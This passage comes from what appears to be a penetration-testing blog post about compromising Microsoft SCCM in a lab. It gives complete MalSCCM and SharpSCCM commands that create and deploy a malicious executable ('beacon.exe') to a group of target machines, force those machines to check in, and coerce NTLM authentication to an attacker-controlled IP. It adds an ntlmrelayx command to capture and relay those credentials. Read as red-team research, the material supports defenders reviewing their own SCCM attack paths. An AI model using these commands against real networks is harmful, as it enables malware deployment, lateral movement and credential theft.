As mentioned by Nettitude in their post on MalSCCM, in order to deploy an application, we need to host the application on a share which the computer account is able to access. For this example we will pretend that we have found an open share.

Lets now create our malicious application, with the following command:

MalSCCM.exe app /create /name:OhDearOhDear /uncpath:"\\SCCM\Open Share\beacon.exe" /server:sccm.sccmlab.local

Now lets deploy this application to the group we created earlier.

MalSCCM.exe app /deploy /name:OhDearOhDear /groupname:1337TargetGroup /assignmentname:ItsRainingShellz /server:sccm.sccmlab.local

And finally, we can optionally coerce the targets in the group to check in, speeding up the deployment time.

MalSCCM.exe checkin /groupname:1337TargetGroup /server:sccm.sccmlab.local

After hours of banging my head against a wall I couldnt get this to work, but here is what I should have seen:

We can do this all in one using SharpSCCM exec, using the -i or -n parameters, we can deploy our payload/executable to a collection of users.

Lateral Movement – Arbitrary NTLM Coercion

For this attack, we add all of our targets into a group, then create an application which has its UNC path set to one we can control. This application is then deployed and the targets will attempt to authenticate to our share. From this point we can relay the authentication onto a service of our choice. For this example, I will just capture the authentication using ntlmrelayx to prove that it is a viable attack vector.

The command given in Chris’s original writeup has since changed, with the -mp and -sc arguments now required. Note that the targeted device (-d) has to match the hostname. In our case, we had to use SERVER1 rather than server1.sccmlab.local.

SharpSCCM.exe exec -mp sccm.sccmlab.local -sc S01 -d SERVER1 -r 10.10.0.161

As usual, we will setup ntlmrelayx to listen in for inbound SMB connections:

python ntlmrelayx.py -smb2support -ip 10.10.0.161 -socks

And we get inbound authentication requests after SharpSCCM deploys an application. We could relay this onward to a number of services.

Conclusion

And there we go, a whole range of ways of compromising SCCM! Undoubtedly there will be more attack paths and research being released over the coming months, so it is well worth conducting a review of attack paths into and within your own SCCM estate. Using BloodHound is a great way of doing this.